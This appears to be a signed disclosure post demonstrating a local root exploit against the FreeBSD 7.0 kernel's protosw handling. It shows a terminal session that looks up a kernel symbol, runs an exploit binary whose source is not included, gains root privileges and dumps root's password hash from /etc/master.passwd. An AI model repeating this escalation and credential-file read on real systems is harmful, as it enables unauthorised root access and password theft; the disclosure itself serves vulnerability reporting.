FreeBSD 7/6x protosw kernel exploit

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> uname -rs
FreeBSD 7.0-RELEASE
> id
uid=1001(donb) gid=1001(donb) groups=1001(donb),0(wheel)
> grep ^root /etc/master.passwd
grep: /etc/master.passwd: Permission denied
> nm /boot/kernel/kernel | grep allproc
c0bf26b8 B allproc
c0bf2670 B allproc_lock
> cc -o x x.c
> ./x 0xc0bf26b8
euid=0
> id
uid=1001(donb) gid=1001(donb) euid=0(root) groups=1001(donb),0(wheel)
> grep ^root /etc/master.passwd
root:$1$fuS6o3Qy$iFlUEpD9Y3ph7rOzMU/br1:0:0::0:0:Charlie &:/root:/bin/csh
>

Happy holidays, all!

D
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.9 (GNU/Linux)

iEYEARECAAYFAklUla4ACgkQttfe3HwtctN/fgCeJDmmpOK8bn1dnssxOkTZXdUg
idUAmwdyoMZnoEfnrR14TQlRDli9mv+j
=Pixh
-----END PGP SIGNATURE-----